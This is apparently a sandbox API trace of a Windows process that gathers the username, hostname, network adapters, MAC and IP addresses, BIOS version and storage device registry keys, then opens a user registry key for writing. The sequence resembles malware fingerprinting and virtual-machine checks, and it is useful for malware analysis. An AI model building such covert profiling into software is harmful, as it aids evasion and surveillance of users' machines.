	[0114.433] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="Nd9E1FYi") returned 0x8
	[0114.433] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0114.433] GetEnvironmentVariableW (in: lpName="LOGONSERVER", lpBuffer=0x209f04c, nSize=0x7fff | out: lpBuffer="\\\\X2VS1CUM") returned 0xa
	[0114.433] GlobalMemoryStatusEx (in: lpBuffer=0x20af0d0 | out: lpBuffer=0x20af0d0) returned 1
	[0114.434] GlobalMemoryStatusEx (in: lpBuffer=0x20af0d0 | out: lpBuffer=0x20af0d0) returned 1
	[0114.434] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
	[0114.434] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
	[0114.434] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
	[0114.434] VerSetConditionMask (ConditionMask=0x1801b, TypeMask=0x80000000, Condition=0x10) returned 0x1b01b
	[0114.434] VerifyVersionInfoA (in: lpVersionInformation=0x20aeecc, dwTypeMask=0x33, dwlConditionMask=0x1b01b | out: lpVersionInformation=0x20aeecc) returned 1
	[0114.434] GetAdaptersAddresses () returned 0x6f
	[0114.460] GetLastError () returned 0x0
	[0114.460] SetLastError (dwErrCode=0x0) 
	[0114.460] GetLastError () returned 0x0
	[0114.460] SetLastError (dwErrCode=0x0) 
	[0114.463] GetAdaptersAddresses () returned 0x0
	[0114.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ethernet", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
	[0114.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Loopback Pseudo-Interface 1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28
	[0114.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local Area Connection* 3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25
	[0114.467] htonl (hostlong=0xffffff00) returned 0xffffff
	[0114.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Loopback Pseudo-Interface 1", cchWideChar=-1, lpMultiByteStr=0x51d4f19, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Loopback Pseudo-Interface 1", lpUsedDefaultChar=0x0) returned 28
	[0114.468] htonl (hostlong=0xff000000) returned 0xff
	[0114.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Local Area Connection* 3", cchWideChar=-1, lpMultiByteStr=0x51d4f35, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Local Area Connection* 3", lpUsedDefaultChar=0x0) returned 25
	[0114.468] GetLastError () returned 0x0
	[0114.468] SetLastError (dwErrCode=0x0) 
	[0114.468] SetLastError (dwErrCode=0x0) 
	[0114.468] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="d8:71:57:e4:2f:01") returned 17
	[0114.468] GetLastError () returned 0x0
	[0114.468] SetLastError (dwErrCode=0x0) 
	[0114.468] GetLastError () returned 0x0
	[0114.468] SetLastError (dwErrCode=0x0) 
	[0114.468] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.469] SetLastError (dwErrCode=0x0) 
	[0114.469] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.470] SetLastError (dwErrCode=0x0) 
	[0114.470] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="d8:71:57:e4:2f:01") returned 17
	[0114.471] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] GetLastError () returned 0x0
	[0114.471] SetLastError (dwErrCode=0x0) 
	[0114.471] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] strncpy (in: _Dest=0x20af074, _Source="192.168.0.240", _Count=0x41 | out: _Dest="192.168.0.240") returned="192.168.0.240"
	[0114.472] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] GetLastError () returned 0x0
	[0114.472] SetLastError (dwErrCode=0x0) 
	[0114.472] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] strncpy (in: _Dest=0x20af0b8, _Source="255.255.255.0", _Count=0x41 | out: _Dest="255.255.255.0") returned="255.255.255.0"
	[0114.473] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0114.473] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] GetLastError () returned 0x0
	[0114.473] SetLastError (dwErrCode=0x0) 
	[0114.473] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.474] SetLastError (dwErrCode=0x0) 
	[0114.474] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] GetLastError () returned 0x0
	[0114.475] SetLastError (dwErrCode=0x0) 
	[0114.475] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0114.475] GetLastError () returned 0x0
	[0114.476] SetLastError (dwErrCode=0x0) 
	[0114.476] GetLastError () returned 0x0
	[0114.476] SetLastError (dwErrCode=0x0) 
	[0114.476] GetLastError () returned 0x0
	[0114.476] SetLastError (dwErrCode=0x0) 
	[0114.476] GetLastError () returned 0x0
	[0114.476] SetLastError (dwErrCode=0x0) 
	[0114.476] GetLastError () returned 0x0
	[0114.476] SetLastError (dwErrCode=0x0) 
	[0114.476] strncpy (in: _Dest=0x20af074, _Source="127.0.0.1", _Count=0x41 | out: _Dest="127.0.0.1") returned="127.0.0.1"
	[0114.476] GetLastError () returned 0x0
	[0114.480] SetLastError (dwErrCode=0x0) 
	[0114.480] GetLastError () returned 0x0
	[0114.480] SetLastError (dwErrCode=0x0) 
	[0114.480] GetLastError () returned 0x0
	[0114.480] SetLastError (dwErrCode=0x0) 
	[0114.480] GetLastError () returned 0x0
	[0114.481] SetLastError (dwErrCode=0x0) 
	[0114.481] GetLastError () returned 0x0
	[0114.481] SetLastError (dwErrCode=0x0) 
	[0114.481] strncpy (in: _Dest=0x20af0b8, _Source="255.0.0.0", _Count=0x41 | out: _Dest="255.0.0.0") returned="255.0.0.0"
	[0114.485] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0114.485] GetLastError () returned 0x0
	[0114.485] SetLastError (dwErrCode=0x0) 
	[0114.485] GetLastError () returned 0x0
	[0114.485] SetLastError (dwErrCode=0x0) 
	[0114.485] GetLastError () returned 0x0
	[0114.485] SetLastError (dwErrCode=0x0) 
	[0114.485] GetLastError () returned 0x0
	[0114.485] SetLastError (dwErrCode=0x0) 
	[0114.485] GetLastError () returned 0x0
	[0114.485] SetLastError (dwErrCode=0x0) 
	[0114.485] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.486] SetLastError (dwErrCode=0x0) 
	[0114.486] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.487] SetLastError (dwErrCode=0x0) 
	[0114.487] GetLastError () returned 0x0
	[0114.488] SetLastError (dwErrCode=0x0) 
	[0114.488] GetLastError () returned 0x0
	[0114.488] SetLastError (dwErrCode=0x0) 
	[0114.488] GetLastError () returned 0x0
	[0114.488] SetLastError (dwErrCode=0x0) 
	[0114.489] GetLastError () returned 0x0
	[0114.489] SetLastError (dwErrCode=0x0) 
	[0114.489] GetLastError () returned 0x0
	[0114.489] SetLastError (dwErrCode=0x0) 
	[0114.489] GetLastError () returned 0x0
	[0114.489] SetLastError (dwErrCode=0x0) 
	[0114.489] wsprintfA (in: param_1=0x20af014, param_2="%02x:%02x:%02x:%02x:%02x:%02x" | out: param_1="00:00:00:00:00:00") returned 17
	[0114.489] GetLastError () returned 0x0
	[0114.489] SetLastError (dwErrCode=0x0) 
	[0114.489] GetLastError () returned 0x0
	[0114.489] SetLastError (dwErrCode=0x0) 
	[0114.489] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.490] SetLastError (dwErrCode=0x0) 
	[0114.490] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.491] GetLastError () returned 0x0
	[0114.491] SetLastError (dwErrCode=0x0) 
	[0114.492] GetLastError () returned 0x0
	[0114.492] SetLastError (dwErrCode=0x0) 
	[0114.492] GetLastError () returned 0x0
	[0114.492] SetLastError (dwErrCode=0x0) 
	[0114.492] GetLastError () returned 0x0
	[0114.492] SetLastError (dwErrCode=0x0) 
	[0114.492] SetLastError (dwErrCode=0x0) 
	[0114.493] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x209f034, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp") returned 0x24
	[0114.493] gethostname (in: name=0x20af02c, namelen=257 | out: name="x2vS1cum") returned 0
	[0114.493] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d6f4c, lpdwDisposition=0x0 | out: phkResult=0x26d6f4c*=0x8f8, lpdwDisposition=0x0) returned 0x0
	[0114.494] RegQueryValueExW (in: hKey=0x8f8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20af0ac, lpData=0x0, lpcbData=0x20af088*=0x26d6f40 | out: lpType=0x20af0ac*=0x7, lpData=0x0, lpcbData=0x20af088*=0xec) returned 0x0
	[0114.494] RegQueryValueExW (in: hKey=0x8f8, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20af0ac, lpData=0x51cec08, lpcbData=0x20af088*=0xec | out: lpType=0x20af0ac*=0x7, lpData=0x51cec08*, lpcbData=0x20af088*=0xec) returned 0x0
	[0114.494] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d706c, lpdwDisposition=0x0 | out: phkResult=0x26d706c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0114.494] FormatMessageA (in: dwFlags=0x11ff, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x20aefe4, nSize=0x100, Arguments=0x0 | out: lpBuffer="\x80\x70\x6d\x02\x6c\x70\x6d\x02\x53\x8d\x01\x04\xac\xf0\x0a\x02") returned 0x12
	[0114.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", ulOptions=0x0, samDesired=0x20019, phkResult=0x20af020 | out: phkResult=0x20af020*=0x0) returned 0x2
	[0114.495] GetLastError () returned 0x0
	[0114.495] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d708c, lpdwDisposition=0x0 | out: phkResult=0x26d708c*=0xb88, lpdwDisposition=0x0) returned 0x0
	[0114.495] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", ulOptions=0x0, samDesired=0x20019, phkResult=0x20af020 | out: phkResult=0x20af020*=0xb90) returned 0x0
	[0114.495] RegQueryInfoKeyW (in: hKey=0xb90, lpClass=0x20aebbc, lpcchClass=0x20af018, lpReserved=0x0, lpcSubKeys=0x20af024, lpcbMaxSubKeyLen=0x20af000, lpcbMaxClassLen=0x20af004, lpcValues=0x20af044, lpcbMaxValueNameLen=0x20af010, lpcbMaxValueLen=0x20aeff8, lpcbSecurityDescriptor=0x20aeffc, lpftLastWriteTime=0x20af008 | out: lpClass="", lpcchClass=0x20af018, lpcSubKeys=0x20af024*=0x3, lpcbMaxSubKeyLen=0x20af000, lpcbMaxClassLen=0x20af004, lpcValues=0x20af044*=0x0, lpcbMaxValueNameLen=0x20af010, lpcbMaxValueLen=0x20aeff8, lpcbSecurityDescriptor=0x20aeffc, lpftLastWriteTime=0x20af008) returned 0x0
	[0114.495] RegEnumKeyExW (in: hKey=0xb90, dwIndex=0x0, lpName=0x20aedc4, lpcchName=0x20af014, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008 | out: lpName="CdRom&Ven_LG&Prod_GTA0N", lpcchName=0x20af014, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008) returned 0x0
	[0114.495] RegEnumKeyExW (in: hKey=0xb90, dwIndex=0x1, lpName=0x20aedc4, lpcchName=0x20af014, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008 | out: lpName="CdRom&Ven_LiteOn&Prod_DS-8ABSH", lpcchName=0x20af014, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008) returned 0x0
	[0114.495] RegEnumKeyExW (in: hKey=0xb90, dwIndex=0x2, lpName=0x20aedc4, lpcchName=0x20af014, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008 | out: lpName="Disk&Ven_&Prod_WDBMYH5000ANC", lpcchName=0x20af014, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af008) returned 0x0
	[0114.497] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af000 | out: lpPreviousCount=0x20af000) returned 1
	[0114.497] timeGetTime () returned 0x30175
	[0114.498] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.498] GetLastError () returned 0xcb
	[0114.498] SetLastError (dwErrCode=0x0) 
	[0114.498] SetLastError (dwErrCode=0x0) 
	[0114.498] SetLastError (dwErrCode=0x0) 
	[0114.498] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.498] GetLastError () returned 0xcb
	[0114.499] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.499] GetLastError () returned 0xcb
	[0114.499] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c60\x52\x2b0e\x413\x2c64\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.499] GetLastError () returned 0xcb
	[0114.499] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.499] GetLastError () returned 0xcb
	[0114.499] SetLastError (dwErrCode=0x0) 
	[0114.499] SetLastError (dwErrCode=0x0) 
	[0114.499] SetLastError (dwErrCode=0x0) 
	[0114.499] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.499] GetLastError () returned 0xcb
	[0114.500] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.500] GetLastError () returned 0xcb
	[0114.500] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2c8c\x52\x2b0e\x413\x2c90\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.500] GetLastError () returned 0xcb
	[0114.500] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.500] GetLastError () returned 0xcb
	[0114.500] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af3b8 | out: lpPreviousCount=0x20af3b8) returned 1
	[0114.500] SetLastError (dwErrCode=0x0) 
	[0114.500] SetLastError (dwErrCode=0x0) 
	[0114.500] SetLastError (dwErrCode=0x0) 
	[0114.501] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.501] GetLastError () returned 0xcb
	[0114.501] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.501] GetLastError () returned 0xcb
	[0114.501] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2cb8\x52\x2b0e\x413\x2cbc\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.501] GetLastError () returned 0xcb
	[0114.501] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.501] GetLastError () returned 0xcb
	[0114.501] SetLastError (dwErrCode=0x0) 
	[0114.501] SetLastError (dwErrCode=0x0) 
	[0114.501] SetLastError (dwErrCode=0x0) 
	[0114.502] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.502] GetLastError () returned 0xcb
	[0114.502] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.502] GetLastError () returned 0xcb
	[0114.502] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2ce4\x52\x2b0e\x413\x2ce8\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.502] GetLastError () returned 0xcb
	[0114.502] timeGetTime () returned 0x3017a
	[0114.502] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f144, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.502] GetLastError () returned 0xcb
	[0114.503] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.503] GetLastError () returned 0xcb
	[0114.503] SetLastError (dwErrCode=0x0) 
	[0114.503] SetLastError (dwErrCode=0x0) 
	[0114.503] SetLastError (dwErrCode=0x0) 
	[0114.503] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.503] GetLastError () returned 0xcb
	[0114.504] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.504] GetLastError () returned 0xcb
	[0114.504] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d10\x52\x2b0e\x413\x2d14\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.504] GetLastError () returned 0xcb
	[0114.504] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.504] GetLastError () returned 0xcb
	[0114.504] SetLastError (dwErrCode=0x0) 
	[0114.504] SetLastError (dwErrCode=0x0) 
	[0114.504] SetLastError (dwErrCode=0x0) 
	[0114.504] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.504] GetLastError () returned 0xcb
	[0114.504] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.504] GetLastError () returned 0xcb
	[0114.505] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d3c\x52\x2b0e\x413\x2d40\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.505] GetLastError () returned 0xcb
	[0114.505] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.505] GetLastError () returned 0xcb
	[0114.505] SetLastError (dwErrCode=0x0) 
	[0114.505] SetLastError (dwErrCode=0x0) 
	[0114.505] SetLastError (dwErrCode=0x0) 
	[0114.505] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.505] GetLastError () returned 0xcb
	[0114.505] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.505] GetLastError () returned 0xcb
	[0114.506] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d68\x52\x2b0e\x413\x2d6c\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.506] GetLastError () returned 0xcb
	[0114.506] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f354, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.506] GetLastError () returned 0xcb
	[0114.526] SetLastError (dwErrCode=0x0) 
	[0114.526] SetLastError (dwErrCode=0x0) 
	[0114.526] SetLastError (dwErrCode=0x0) 
	[0114.526] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.526] GetLastError () returned 0xcb
	[0114.527] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f414, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf4bc\x209\xf57c\x20a\xf57c\x20a") returned 0x0
	[0114.527] GetLastError () returned 0xcb
	[0114.527] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f2fc, nSize=0x7fff | out: lpBuffer="\xdd09\x1760\x2d94\x52\x2b0e\x413\x2d98\x52\xff54\x412\xf4a4\x20a\xf504\x20a\xf368\x209\x04") returned 0x0
	[0114.527] GetLastError () returned 0xcb
	[0114.527] timeGetTime () returned 0x30193
	[0114.527] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f144, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0114.527] GetLastError () returned 0xcb
	[0114.527] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0114.528] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d70b0 | out: phkResult=0x26d70b0*=0xb94) returned 0x0
	[0114.528] RegCreateKeyExW (in: hKey=0xb94, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x26d70ac, lpdwDisposition=0x0 | out: phkResult=0x26d70ac*=0xb98, lpdwDisposition=0x0) returned 0x0
